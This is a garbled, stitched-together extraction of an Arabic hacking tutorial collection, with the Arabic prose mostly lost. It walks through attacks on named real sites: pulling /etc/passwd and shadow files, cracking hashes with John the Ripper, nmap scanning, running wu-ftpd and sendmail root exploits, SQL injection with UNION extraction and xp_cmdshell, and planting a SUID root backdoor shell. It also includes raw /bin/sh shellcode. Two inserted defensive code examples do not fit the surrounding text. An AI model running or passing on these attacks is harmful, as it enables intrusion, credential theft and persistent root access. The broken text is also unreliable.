---------------------.
.
.
Apache/1.3.* Server
.
.
--------------------- ...
110 25
smtp pop
) ( Linux
host 7lem.com

-:
) (
-:
.... queso

/queso http://www.7elm.com
queso 80
... SunOS 5.7
/http://www.condor.com ) support
webmaster ... info ( DNS
whois
whois whois whois
man whois

195

http://www.psyon.org/tools/index.html

whois

http://www.google.com/search?q=whois&btnG=Google+Search

~~~~~~~~~~~~~~~~~~~~~~~~~~
void eye ShadowSecurityScaner !!






Apache IIS CGI Perl PHP


..



counter
mp3 Don't Tell Me


25 23 21 110
Ikonboard v2.1.8b
Ikonboard v2.1.8b Ikonboard v2.1.7b
cgi pl

% 80 cgi
etc/passwd
FreeBSD
shadow master.passwd ..
...
++++++++++++++++++++++++

} { http://www.fbunet.de/cgibin/nph-%20%20%20%20%20.cgi CGI
....

196




: timduff.com




i'm from saudi arabia



/../../../../../../../../../../../../../../../../../
/../ !
-:
-1
-2
.....
-3 ) ( Perl - Cgi
-4 %100
) (
-5 )
(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/http://www.timduff.com
) (
)( sh
shell * sh.
shell
)(bat

197

)( C

gcc
gcc Exploit.c -o Exploit
) * c. * C. c
++ )* (h.
(

Perl
)
(
....
= Exploit

password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



198

10

......

~~~~~~~~~~~~~~~~~~~~~~~~~~
!...

* = x Shadowed
= EpGw4GekZ1B9U DES
FreeBSD 13

password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
Ctrl + Shift
... hwwilson.com
-:
root:x:0:1:Super-User:/:/sbin/sh
root
root

199

x
x

0

1

Super-User:/:/sbin/sh

++++++++++++++++++++++++++++

) (encryption ) (shadowed~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
shadow file * x # !
root:x:0:1:Super-User:/:/sbin/sh

root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
Q71KBZlvYSnVw
....

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~
Crack 5.0a john the ripper jack the ripper
Crack 5a john the
ripper john the ripper .....
-:
wordlist .

200

[Diagram: each word of the wordlist (e.g. song) is hashed (Q6LiJ6ct1oUBz) and compared with the target hash Q2wrtUo9LPq2R]

..
| | ------------------------------------------------------------------------------- -:

}{ | 5000 ) john the ripper (700
| -------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
john the ripper
john -w:wordlist passwd
wordlist
passwd
-----------------------------------------------------------------------------------------------
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1998.

E:\Desktop\junk\john the ripper>john -w asswd passwd.txt
John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE
E:\Desktop\junk\john the ripper>
-----------------------------------------------------------------------------------------------
john.pot

...
brute force
wordlist 3
.. wordlist

5000 wordlist brute
force
john the ripper brute force
john -i passwd

201

passwd
...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
Unshadow !!
) ( shadow file
:
Linux    : /etc/shadow                         token = *
SunOS    : /etc/shadow                         token = *
FreeBSD  : /etc/master.passwd or /etc/shadow   token = * or x
IRIX     : /etc/shadow                         token = x
AIX      : /etc/security/passwd                token = !
ConvexOS : /etc/shadow or /etc/shadpw          token = *
token passwd
! etc/security/passwd/
)
(
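Worked example, added here and not from the original text, covering both the seven-field passwd line walked through above (root:x:0:1:Super-User:/:/sbin/sh) and the shadow tokens just listed: a small auditor that splits each line, recognises the tokens (x, *, !, plus the NP and *LK* markers Solaris shadow files use) and flags what a defender looks for in such a file: an unshadowed hash, an empty password field, a second UID-0 account, a UID shared by several names. The sample lines are constructed, not a real host's file.

```python
from dataclasses import dataclass
from typing import Dict, List

# Tokens meaning "no hash here" (shadowed, or a no-password / locked marker).
SHADOW_TOKENS = {"x", "*", "!", "NP", "*LK*"}

# Constructed sample input (the hash string is made up, not a real hash).
SAMPLE_PASSWD = """\
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
smtp:x:0:0:Mail Daemon User:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
legacy:ab3Dk9Lm2QxYz:106:1::/home/legacy:/bin/sh
guest::107:1::/home/guest:/bin/sh
"""


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @property
    def shadowed(self) -> bool:
        return self.passwd in SHADOW_TOKENS

    @property
    def empty_password(self) -> bool:
        return self.passwd == ""


def parse_passwd_line(line: str) -> PasswdEntry:
    """Split one 'name:passwd:uid:gid:gecos:home:shell' line (shell may be empty)."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        raise ValueError(f"expected 7 fields, got {len(fields)}: {line!r}")
    name, passwd, uid, gid, gecos, home, shell = fields
    return PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell)


def audit_passwd(text: str) -> List[str]:
    """Return one finding per problem; an empty list means nothing was flagged."""
    entries = [parse_passwd_line(l) for l in text.splitlines() if l.strip()]
    findings: List[str] = []
    for e in entries:
        if e.empty_password:
            findings.append(f"{e.name}: empty password field (login without a password)")
        elif not e.shadowed:
            findings.append(f"{e.name}: hash stored in passwd itself (world-readable), not shadowed")
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account other than root")
    by_uid: Dict[int, List[str]] = {}
    for e in entries:
        by_uid.setdefault(e.uid, []).append(e.name)
    for uid, names in by_uid.items():
        if uid != 0 and len(names) > 1:  # UID 0 duplicates are reported above
            findings.append(f"uid {uid} shared by {', '.join(names)}")
    return findings
```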
shadow
passwd file shadow passwd
...
http://wilsonweb2.hwwilson.com/etc/passwd

202

----------------------------------------------------------------------------------------------- x token
etc/shadow/

http://wilsonweb2.hwwilson.com/etc/shadow

----------------------------------------------------------------------------------------------- x

-:
...

-:

www.securiteam.com/exploits/archive.html

/http://www.ussrback.com
+
/http://www.secureroot.com

203


/http://www.rootshell.com

/http://www.ussrback.com

www.secureroot.com/category/exploits

www.hitboss.com/Hacking

www.undergroundnews.com/resources/s...ound/search.asp
Warez.com-Underground
/http://www.warez.com
Hacking
((
/http://www.neworder.box.sk
Security Search Engine
/http://www.bugs2k.com
insecure
/http://www.insecure.org
<XMP></BODY></HTML/>
http://public.www.easynet.co.uk/cgi...ail/formmail.pl

" (" )

204

> <
...

..

.....


....

* ) (host
* ) (passwd
/etc/passwd
shadow passwd

john the ripper




) (pwd ) (


bin
etc passwd
dev
lib
tmp
usr
nt
205

nt admin.pwd
*
cgi-bin cgi

php.cgi
/http://www.jewish.org
/http://www.jewish.org /cgi-bin php.cgi

http://www.jewish.org/cgi-bin/php.cgi


scripts
http://www.jewish.org/scripts/php.cgi
scripts winnt
cgi-bin

" )( "

206

><
>< ICER :
: ...
)(
...
(:

nslookup, host, dig, ping, traceroute,telnet, ssh, ftp
gcc )... (
nmap and netcat .
* :
-1 ..
.
-2 nmap
-3 NetCat
-4


...
....
* :
(a) Linux (http://www.slackware.com
(b) Nmap (http://www.insecure.org
(/c) NetCat (http://www.l0pht.com/~weld/netcat
-:
-1 ) ( P:
-2 nmap :
*tar zxvf nmap.tar.gz (1
cd nmap (2
configure && make && make install/. (3
-3 ..
www.target.com
-4
nslookup www.target.com
196.1.2.3
-5 -:
""nmap -sS -O 196.1.2.3
-:
root@IcEr:~# nmap -sS -O 196.1.2.3

Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on www.target.com (196.1.2.3):
(The 1531 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
25/tcp     open        smtp
80/tcp     open        http
111/tcp    open        sunrpc
113/tcp    open        auth
515/tcp    open        printer
963/tcp    open        unknown
1024/tcp   open        kdm
4444/tcp   filtered    krb524
6000/tcp   open        X11
6699/tcp   filtered    napster
OS guess for host: Linux 2.2.14-2.2.16
Uptime 0.160 days (since Mon Apr 30 14:51:06 2001)

Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds
root@IcEr:~#

(:
...
FTP ..
daemon

-: FTP daemon
"telnet 196.1.2.3 21"

"ftp 196.1.2.3"

:
root@IcEr:~# ftp 196.1.2.3
Connected to 196.1.2.3.
220 www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000) ready.
Name (target:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@IcEr.pandora.net
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> by
root@IcEr:~#
.wu-2.6.0
(; anonymous
####### #######
-: 8 7
.FTPd
( )
wuftpd2600.c
red hat 6.2


root access
(-;
root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3
Target: 196.1.2.3 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1)
from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
..loggin into system
USER ftp
.Guest login ok, send your complete e-mail address as password 331
<PASS <shellcode
Next time please use your e-mail address as your password-230
for example: icer@ae.net -230
.Guest login ok, access restrictions apply 230
STEP 2 : Skipping, magic number already exists:
[[87,01:03,02:01,01:02,04
STEP 3 : Checking if we can reach our return address by format string
(STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now
.STEP 5 : Sending code.. this will take about 10 seconds
Press ^\ to leave shell
Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686
unknown
(uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp
!Bang! You have root
..
man gcc
..
(:

search..U will find what U wanna
.. .. .. ...
.. annonymous

209

..
..
..
..
.. .

" " htaccess

210

><
>< BSD-r00t :
|

| *
|
| * htaccess.
|
| * htaccess.
|
| * error
| * | index
|
| * /
|
| *
|
| * .htpasswd
|
| * htaccess.
|
| * htaccess.
|
| *
|
| *
-------------------------------------------------*
----------- ,

.. htaccess. .

* htaccess.
---------------------- -1
-2 error
-3 index
-4/
-5 .. html , .asp.
-6
* htaccess.
-------------------------- " "Notepad

htacces. txt. ,

" - "htaccess. . -
* error
-----------------------

211

.
error -:
- error
-
- htaccess.
ErrorDocument error_num
directory_file
error_num " " directory_file
error
.
ErrorDocument 404
:
/errors/nfound.html
errors - :
----------------------
| 400 | Bad Syntax   |
| 401 | Unauthorized |
| 402 | Not Used     |
| 403 | Forbidden    |
| 404 | Not Found    |
----------------------
----------------------* index
---------------------------------------------- index

-:
- index " "
- htaccess. -:
Options -Indexes
* /
------------------------------------ htaccess.


..
- :
deny from ???.???.???.???
... .
-:
deny from all
-:
... allow from

212

...
*
------------------------------------ Redirection htaccess.

htaccess.

-:
Redirect /somewhere/???.??? http://www.site.com/newlocation
???.???/somewhere/
???.???/http://www.site.com/newlocation
.
---------* .htpasswd
----------------------- , htaccess. .
htaccess
htpasswd -:
user1:EncryptedPwd1
user2:EncryptedPwd2
o user1 , user2 .
o EncryptedPwd1 , EncryptedPwd2


http://www.euronet.nl/~arnow/htpasswd

http://www.e2.unet.com/htaccess/make.htm
Security fu93hds3

http://www.euronet.nl/~arnow/htpasswd
o username : Security
o password & re-enter password : fu93hds3
o calculate --> Security:893bNicBcwszw
htaccess. .
htaccess
.
* htaccess.
---------------------------
, .
htaccess.

.

213

--:
AuthUserFile /somewhere/.htpasswd
AuthName "Enter your user and passed please"
Require valid-user
AuthType Basic
<Limit GET POST>
require valid-user
</Limit>
o /somewhere/.htpasswd htpasswd.
o Enter your user and passed please

* htaccess.
---------------------------- ,
..
- :
<Files .htaccess>
order allow,deny
deny from all
</Files>
. error 403
*
------------------------------ html. txt. .
-:
AddType text/plain html
-:
http://www.pharaonics.net/books/MIME.txt

" " FTP

214

> <
> :<
FTP
FTP File Transfer Protocol
TCP/IP
FTP
Formats
,FTP .
:
:
:Download
Host .Local
:Uplaod
Local .Host
:
:Secure FTP
.
:Anonymous FTP
guest anonymous
.
:
:Public Domain

.
:Freeware
.
:Shareware

215

FTP :

:ASCII
) (American Standard Code for Information Interchange
bits .127
.
.
:Binary
bits 255
.
ASCII & jpg & gif
bmp avi - ram - mpg - mp3 -
wav
exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - :
b64 - bhx MS Office
.

: FTP
:
UNIX
:UNIX
:ascii ASCII
.
:binary
.
:status ASCII .Binary
:help .UNIX

216

:dir
:ls .
:cd directory .
:get filename .
:mget filename .
:pwd .
:bye .
:Shell


Tripod Unix Shell ftp ftp :
ftp.tripod.com " "IronPrivate
"******" . Unix.

Unix
:
http://www.pc-worlds.net/lunexx.html
.
:Browser
URL
ftp:// http:// FTP
.
:SLIP/PPP
.Client Programs
Windows .Ws_ftp
:Ws_ftp LE 5.06
Session
Profile Profile Name
My Home Page In Tripod Host Name
ftp.tripod.com Host Type Auto Detect
User ID

IronPrivate Password ****** ,


.OK :

217



... .
.
:Telnet
Telnet
. .

Windows
"" .

Telnet :Windows Telnet Start


Windows
Run Telnet .. Connect Remote
.System Connect Host Name
Port ) (
Term Type . Connect
. Disconnect Connect
.Exit

" "FTP
218

> <
>< hacker dz :


FTP

21

FTP

Superscanne


Start

Run

ftp n

<FTP


Open

Enter

<FTP
To

To



Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0).

ftp> quote user ftp

331 Anonymous access allowed, send identity (e-mail name) as password.

ftp> quote cwd ~root

530 Please login with USER and PASS

ftp> quote pass ftp

230 Anonymous user logged in.




20


Pwd

Cd

Cd black

Ls

Get

Get black.exe
Put

Get

Put black.exe
Clos



Code   Meaning
110    Restart marker reply.
120    Service ready in nnn minutes. (nnn is a time)
125    Data connection already open; transfer starting.
150    File status okay; about to open data connection.
200    Command okay.
202    Command not implemented, superfluous at this site.
211    System status, or system help reply.
212    Directory status.
213    File status.
214    Help message.
215    NAME system type.
220    Service ready for new user.
221    Service closing control connection.
225    Data connection open; no transfer in progress.
226    Closing data connection.
227    Entering passive mode (h1, h2, h3, h4, p1, p2).
230    User logged in, proceed.
250    Requested file action okay, completed.
257    "PATHNAME" created.
331    User name okay, need password.
332    Need account for login.
350    Requested file action pending further information.
421    Service not available, closing control connection.
425    Can't open data connection.
426    Connection closed; transfer aborted.
450    Requested file action not taken. (File already in use by something else)
451    Requested action aborted: local error in processing.
452    Requested action not taken. (Not enough memory to execute the action)
500    Syntax error, command unrecognized.
501    Syntax error in parameters or arguments.
502    Command not implemented.
503    Bad sequence of commands.
504    Command not implemented for that parameter.
530    Not logged in.
532    Need account for storing files.
550    Requested action not taken. (File not found, no access possible, ...)
551    Requested action aborted: page type unknown.
552    Requested file action aborted.
553    Requested action not taken. (File name not allowed)

" SQL "

221

> <
>< linuxray :
: ) ( SQL

ASP
SQL ASP SQL
SQL
1433
SQL

SQL .
: SQL
PHP ASP




_LinuxRay
- - -
. Administrator
...
: SQL
User Name Passwd
:
User name and Passwd ASP
* sql.
htr.+
:
http://target/page.asp+.htr
: target
: Page asp
: htr.+
....

View Source ASP
:

222

<%
Set DB = Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%>
---------------------------------------------------------------- _LinuxRay
6666666
-----------------------------------------------------------------

ASP :
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
* inc.

.
ASP
database.inc
<!--#include file="database.inc"-->

global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
:
global.asa+.htr

223

IIS 3 ASP data$::


file.asp::$data
IIS 3 .
...
!! SQL
Visual interdev 6.0
ACCESS 2000

File

New

(Project (Exiting Data
.

Create


Data Link Properties
- -
- 1 Select or enter server name
- 2 User Name
- 3 Password
) (Blank Password
Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
OK .

" " SQL


> <
224

>< hish_hish :
(:
,
PHP ASP
.
SQL Server , MySQL,Oracle


SQL



(: ((((:


SQL


SQL


SQL injection


/http://www.stc.com.sa

http://www.stc.com.sa/arabic/scripts/ar_frame.asp?pagenum=25
!!!!
SQL injection

' :
' :

:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/arabic/Scripts/ar_csd_reply.asp, line 33

225

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' AND Password=''.
/admin/admin.asp, line 13

SQL
inject SQL Query
.
SQL injection


:code

SELECT * from Users WHERE User_Name='<field from web form>' AND Password='<field from web form>'

if( TRUE ) {
    Login OK
} else {
    Login FAILED
}


admin :
t0ps3cr3t :
SQL :
:code

SELECT * from Users WHERE Users_Name='admin' AND Password='t0ps3cr3t'

User admin
t0ps3cr3t
TRUE .
FALSE
: . SQL
> <field from web form
' SQL
:
:code

SELECT * from Users WHERE User_Name='' AND Password=''


' '


!!
blah' OR '1'='1 :
.
SQL
:code

SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'


SELECT * from Users
Users
WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'

'blah' OR '1'='1'
OR

'blah'
TRUE
'1'='1'
1 1 !!!!
TRUE OR TRUE
TRUE

: TRUE TRUE

TRUE TRUE SQL injection
Users


.....
SQL WHERE
(two dashes) -- ,

blah' OR '1'='1'--
) --
SQL
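Worked example, added here and not from the original post: the login check described above as a Python/sqlite3 function that pastes the form fields into the SQL string, beside the parameterised form. The input quoted in the text (blah' OR '1'='1, and the -- variant) matches a row against the concatenated query but is treated as a plain string by the parameterised one. The table, its single row and the function names are constructed.

```python
import sqlite3

# Constructed in-memory stand-in for the Users table described in the text.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (User_Name TEXT, Password TEXT)")
    db.execute("INSERT INTO Users VALUES ('admin', 't0ps3cr3t')")
    return db


def login_vulnerable(db: sqlite3.Connection, user: str, password: str) -> bool:
    """The pattern the text describes: form fields are concatenated into the SQL.

    Quotes in the input therefore close the string literal and the rest of the
    input becomes part of the WHERE clause.
    """
    sql = ("SELECT * from Users WHERE User_Name='" + user +
           "' AND Password='" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db: sqlite3.Connection, user: str, password: str) -> bool:
    """Hardened form: bound parameters, so the input is always data, never SQL."""
    sql = "SELECT * from Users WHERE User_Name=? AND Password=?"
    return db.execute(sql, (user, password)).fetchone() is not None
```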

having clause

'having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/Arabic/Scripts/ar_csd_reply.asp, line 33


group by

'group by cs_isp_user.UserID-passwd

'group by cs_isp_user.UserID,cs_isp_user.passwd-!

:
--(blah' group by (username :
:
:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'username'.
/arabic/Scripts/ar_csd_reply.asp, line 33

username
password ,username,id,userid,email
first_name,
userid
:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.passwd' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/arabic/Scripts/ar_csd_reply.asp, line 33

228

cs_isp_user
passwd

--(blah' group by (passwd :
:
:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/arabic/Scripts/ar_csd_reply.asp, line 33

UserID userid
MS SQL Server (:
UserID passwd


(:
blah' INSERT INTO :
cs_isp_user(UserID,passwd
( --('VALUES('M_3','hi
M_3 hi

) ( inject


id ) (
user

id
username ) ( admin1
passwd
union )
(
blah' union SELECT username FROM user :


:

229

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/admin/admin.asp, line 13

id
blah' union SELECT username,username FROM user



blah' union SELECT username,username,usernam
e,username,username FROM user

:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Lame_Admin' to a column of data type int.
/admin/admin.asp, line 13

( :
)SQL
(int )( Lame_Admin
Lame_Admin ,
(: microsoft ( :

blah' union SELECT passwd,passwd,passwd,pass:
wd,passwd FROM user


:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'stupid' to a column of data type int.
/admin/admin.asp, line 13





Stored Procedure
Built-in
Stored Procedure SQL Server sa
SQL Server
SQL Server
Stored Procedure 100

+-----------------------+
| xp_cmdshell           |
| xp_regread            |
| xp_regdeletekey       |
| xp_regdeletevalue     |
| xp_regwrite           |
| xp_servicecontrol     |
+-----------------------+

Procedure
'exec master..xp_cmdshell 'dir
xp_cmdshell

'exec master..xp_regwrite 'REGISTERY KEY' VALUE
231

asp
asp

))CREAT TABLE M_3 ( source varchar(8000
M_3 varchar 8000


'bulk insert M_3 from 'c:\InetPub\wwwroot\login
asp.

union .

" "
> <
>< CONIK :




-:
-:1
-:

232

user administrator


) (



-:2
-: %99 C

.
shell

PHP Shell PHP .

Kernel 2.2.x
) C (
perl
linux Redhat 7.3

233


-:3
-:
file.pl/.

----Access Denied

-----chmod +x Conik.pl

Conik.pl/. $
-:4 C
-:
<------ gcc -o Conik Conik.c
-:
gcc -o Conik conik.c

Conik.c/.

gcc -o sendmail sendmail.c $
sendemail/. $
<Usage : sendmail <host> <OS> <user> <password
<----- sendmail smtp.israel.com RedHat-7.3 anonymous anonymous /. $

234

israel
...connecting to host
...connected
id
(uid=0(root) gid=0(root
Sendemail
Root Exan nofer
XXX. SENDMAIL

(-:

-:5
-:
-:6 Conik C Perl


PHP - CGI - UNICODE - VB - etc
-:7 UNICODE
-: UNICODE IIS Microsoft

-: UONICODE

235

UONICODE
CGI
cgi-bin/view-source?../../../../../../../etc/passwd /
cgi-bin/phf/
cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/

NT : Uni code , bofferoverfollow , tftp


Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD,
,WU-FTPD, Kernel Exploits, rootkits
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel
,exploits, rootkits, ProFTPD, WU-FTPD

236

" "
> <
><Black_sNiper :
...

..

.:

who
rwho
finger

237


.:
username : Black
password : Black2
test demo
.:
etc/passwd/
etc/group/
etc/hosts/
usr/adm/sulog/
usr/adm/loginlog/
usr/adm/errlog/
usr/adm/culog/
usr/mail/
usr/lib/cron/crontabs /
etc/shadow/
.: bin


)( )( !!
.:
$ ed passwd
exec login !!
!!
.:
)( ..
.:
$ pwd
.:
$ /usr/admin
..
.. :
$ /usr/Black
!!
.:
$ ls /usr/Black
.:
mail
pers
games
bin
profile.
.:
$ cd

238

$ ls -a
:
:
profile.
$
.:
$ cat letter
letter
.:
$ passwd
!! ..
.:
$ grep phone Black

.:
$ cp letter letters
.:
$ write
.:
$ who
safadM tty1 april 19 2:30
paul tty2 april 19 2:19
gopher tty3 april 19 2:31

.. .:
$ cat /etc/passwd
:/:root:F943/sys34:0:1:0000
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
.:
:Black:chips11,43:34:3:Mr doooom:/usr/Black

..
.:
$ ls /etc/group
root::0:root
adm::2:adm,root
:bluebox::70

239

!!

..

"
"
><
> : <
UNix Usage IN HackinG

.. up to date

(:
: pc , servers , supercomputers
BOX
..
... root , superuser
....
240

:
.. .. windows
..
.. ...
:
-1 ... nt .
9x
.. ..
..
-2 .. ..
...
.. :
-1 ). (
-2 open source
.. (:

BSD ..

...
..
.. ) SuSe
(
MDK
..

9 ) 7.2 (
.. .. ... .. .. ..
.. ... .. ..
.. ... .. (:
..
.. ... .. ..
..
.. ..
.. ..
internal .. winmodems
.. windows ..
(:
.. external real or true modems
... acorp , u.s. robotics
serial USB
...
.. isp (:

241


..


:
-1 ..

isp ...
-2 ...
-3 ... .. ..
(:
=====< ... ..
======< ======< ...
.. .
:

.. ..
-4 gov .mil. edu.
.
-5 .. .
REdirecting
: TCP ..
TCP\IP
....
... =D
..

.. ) (

<< service..
service daemon or server
.. ..
=D
..
FTPd
FTP
21
telnetd Telnet
23
(!sendmail (yes
SMTP
25
apache
HTTP
80
qpop
POP3
110
d ftp , telnet ..etc daemon
: www.host.net
TCP 80

GET /HTTP/1.1 /index.html ..
index.html

242

daemons ...
=<
daemons

... ..
... port scaners
..
... nmap fyodor
!!.. ..
=>
/http://members.lycos.co.uk/linuxdude/e3sar
.. nmap rpm
:
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
.. target.edu
..
:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
25/tcp     open        smtp
80/tcp     open        http
110/tcp    open        pop3
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
nmap !!
daemons target.edu
..
.. .. .. ..
.. ... TCP :
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host

(:
SunOS 5.6 -1
sunOS standard -2
:
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.
sendmail smtp
8.11.0/8.9.3
..
.. daemon

:
nmap
bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
25/tcp     open        smtp
80/tcp     open        http
110/tcp    open        pop3

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

|:
!!!!!!
!!!!!! sunOS =@
..

..
...
Ss- =D
:
bash-2.03$ man nmap
..
) (
:
bash-2.03$ ls
program.c
sh-2.03$ ftp shell.com
Connected to shell.com
220 shell.com FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.
ftp

.
sh-2.03$ vi exploit.c
c.
.

sh-2.03$ gcc program.c -o program
sh-2.03$ ./program
: ..

. usage
-: .

..

http://www.linux.com.cn/hack.co.za
..
..

.. TARGET.EDU
sendmail 8.11.0
..

:
http://www.pharaonics.net/less/NEtworks/124.htm
. .. )
(
.. ....
..

..
www.securityfocus.com :
www.insecure.org/sploits.html
..
..
... ) (

shell code
..

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

.. /bin/sh

..
.
...
..
..
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fri Sep 15 11:45:34 from <yourIPaddress>.


sh-2.03
exploit.c
.. :
sh-2.03$ gcc exploit.c -o exploit
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
sh-2.03$ ./exploit target.edu 25
...
$ whoami
root
.. =(
..
local
...
) =((
.. =<
-: .. ..

..
.. .edu


microsoft.com , ibm.com etc
...
..
<----- <------ .

.. exit



..
...
..
.. ... =| =|

=| !!!!!!
(= ...

..
..
-1 sushi

sushi suid shell /bin/sh


suid :
sh-2.03$ cp /bin/sh /dev/nul

.. dev
null
= D =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
-:
sh-2.03$ chmod 4775 nul
4775 suid .
chmod +s nul ..
..
..
sh-2.03$ exit
80 = D :
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
=(
.. suid sushi
sash A
stand-alone shell
...
suid /bin/sh sushi
-2
/etc/passwd

